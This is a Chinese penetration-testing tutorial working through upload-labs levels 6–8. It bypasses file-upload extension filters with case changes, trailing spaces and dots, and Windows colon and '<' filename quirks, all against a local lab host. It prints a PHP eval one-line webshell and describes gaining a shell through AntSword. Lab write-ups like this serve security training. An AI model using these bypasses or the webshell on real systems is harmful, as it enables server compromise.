渗透测试-文件上传之大小写和window特性绕过(三)
文件上传之大小写和window特性绕过
文件上传upload-labs实验室第6,7,8关
文章目录
- 文件上传之大小写和window特性绕过
- 前言
- 一、什么是window特性
- 二、大小写和window特性绕过
- 1.大小写绕过
- 2.利用空格和点绕过
- 总结
前言
一、什么是window特性
window特性就是window对于文件的后缀名自动的修改,例如空格和点,冒号后面的内容都省略掉,可以利用window特性进行绕过。
二、大小写和window特性绕过
1.大小写绕过
第六关没有限制大小写,可以进行大小写绕过
上传文件zhi.PhP
上传成功。
复制网址到蚁剑进行连接
http://192.168.222.4/upload/upload/202204160654088873.PhP
连接成功,成功拿到shell。
这里补充关卡四,实验还有另一个方法,也可以行的通就是利用window特性冒号进行绕过。
第一步
上传58.jpg文件
第二步
用burp抓包,修改后缀名,修改为58.php:.jpg重发
修改成功,成功上传58.php文件,将58.php:.jpg解析成.php文件,冒号后面的内容都会省略掉,会生成.php文件
在burp上再修改为58.<进行重发
再查看文件大小,原来上传的时候是0kb,再上传是大小增加了
打开文件查看,里面存在一句话木马
<?php @eval($_POST['chopper']); ?>
复制网址上传到蚁剑进行连接
http://192.168.222.4/upload/upload/58.php
连接成功,成功拿到shell。
关卡四的实验原理很简单,利用window和php环境的叠加特性,以下符号在正则匹配时的相等性:
双引号’’ = 点号.
大于符号> = 问号?
小于符号< = 星号*
上面则是用了<号,再次上传58.<,重写58.php内容,webshell代码就会写入原来的空文件中。
2.利用空格和点绕过
接下来进行第七关
看一下源代码,发现没有限制空格
利用空格进行绕过,在window中,空格会自动省略
上传zhi.PhP文件,进行抓包修改文件后缀名
在zhi.PhP后面加上空格和点
找到路径
…/upload/202204160636393878.php
复制网址到蚁剑进行连接
http://192.168.222.4/upload/upload//202204160748393371.php
连接成功,成功拿到shell。
第八关
查看源码可知没有限制点,利用点进行绕过
上传58.jpg文件,进行抓包修改为58.php.
复制网址到蚁剑连接
http://192.168.222.4/upload/upload/58.php
连接成功,成功拿到shell。
总结
本次实验是对文件上传漏洞进一步提升练习,学会了window特性方法的绕过,介绍了几种常用的绕过方法。
渗透测试-文件上传之大小写和window特性绕过(三)相关推荐
- 渗透测试-文件上传/下载/包含
渗透测试-文件上传/下载/包含 概述 一.常见校验上传文件的方法 客户端校验 服务器端校验 1.校验请求头 content-type字段 2. 正则匹配来判断文件幻数(文件头)内容是否符合要求 3. ...
- 2022渗透测试-文件上传漏洞的详细讲解
目录 1.什么是文件上传漏洞 2.生成图片木马 3.靶场 1.第一关 2.前端检测(第二关) 3.服务器端检测--MIME类型(第二关) 4.服务器端检测--文件类型(第十四关) 5.服务器文件内容验 ...
- 渗透测试-文件上传之getimagesize函数绕过
文件上传之getimagesize函数绕过 文章目录 文件上传之getimagesize函数绕过 前言 一.什么是getimagesize函数 二.文件上传之getimagesize函数绕过 1. g ...
- 渗透测试-文件上传之过滤绕过(二)
文件上传之过滤绕过(二) 文件上传实验室第3,4关 文章目录 文件上传之过滤绕过(二) 前言 一.下载upload实验室,进行练习 二.进行后缀名绕过,拿shell 1.更改后缀名.php3绕过 2. ...
- 渗透测试-文件上传漏洞之MIME type验证原理和绕过
文件上传漏洞之MIME type验证原理和绕过 文章目录 文件上传漏洞之MIME type验证原理和绕过 前言 一.什么是MIME type 二.MIME type验证原理和绕过 1. MIME ty ...
- 渗透测试-文件上传之双写文件名和::$DATA绕过(四)
文件上传之双写文件名和::$DATA绕过 文件上传实验室upload-labs第9,10,11,12关 文章目录 文件上传之双写文件名和::$DATA绕过 前言 一.什么是::$DATA 二.双写文件 ...
- 58.网络安全渗透测试—[文件上传篇8] —[. htaccess重写解析漏洞-突破上传]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.. htaccess重写解析漏洞 1.重写解析漏洞的原理: 2.重写解析漏洞的利用: 一.. htacces ...
- 53.网络安全渗透测试—[文件上传篇3]—[扩展名黑白名单穷举-突破上传]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.黑白名单的穷举 1.解题过程: 2.扩展名字典 一.黑白名单的穷举 1.解题过程: 第一步:发现文件上传动作 ...
- 组合使用Laravel和vfsStream测试文件上传
核心要点 \ 在应用开发中,测试是很重要的,在诸多的开发工具中,测试驱动开发是很伟大的一项: \ 测试文件上传并不像人们想象的那么简单: \ 目前,有很多很棒,但不为大家所熟知的测试工具: \ Lar ...
最新文章
- Linux拷贝数据死机了,Linux系统“死机”时怎么办?
- java se 7u67_Linux下安装jdk-7u67-linux-x64.rpm
- boost::fusion::push_front用法的测试程序
- ITK:遮盖一张图像给定标签图
- MySQL exists后面的子查询使用
- Linux内存占用分析的几个方法,你知道几个?
- Android Fragment懒加载
- mysql min怎么用_MySQL中MIN()函数的使用教程
- Text段、Data段和BSS段
- Runtime.getRuntime().exec()调用外部程序
- linux编程基础黑马要点总结,黑马《linux基础编程》学习笔记(从6到10)
- Cinema 4D R25 for mac三维动画设计
- Ubuntu通用基础教程
- layui树形美化_Layui导航树美化 - walkwithdream的个人空间 - OSCHINA - 中文开源技术交流社区...
- 加减法叫做什么运算_加减法的意义及运算定律、性质
- 在c的基础上关于c#入门的一些个人理解
- 微信小程序返回上一页各种方法
- C#锐利体验 第十六讲 映射
- PT100转RS485热电阻Modbus低成本数据采集模块
- html格式转换word清除格式,Word2010怎么清除格式?word清除格式(图文)教程
热门文章
- 使用BuildR插件快速打造建筑模型(附带PDF)
- 百度UNIT 关于导航的连续意图识别的解决方案
- 基于卷积神经网络的人脸识别(自我拍摄获取数据集)
- material design学习笔记
- 苹果手机耗电快_苹果手机耗电太快是什么原因?怎么办?这些解决方法最实用...
- 用苹果手机拍照,这5个功能要了解,不然手机真的白买了
- 做库存功能业务场景详解,S2B2B系统助力建筑建材企业精准掌握库存动态
- AWC EC2创建步骤
- java中ReentrantLock实现,公平锁和非公平锁,AQS并发队列,
- 许洋带您了解2022精酿啤酒技术展|山东啤酒文化节-展现精酿魅力,亮点大曝光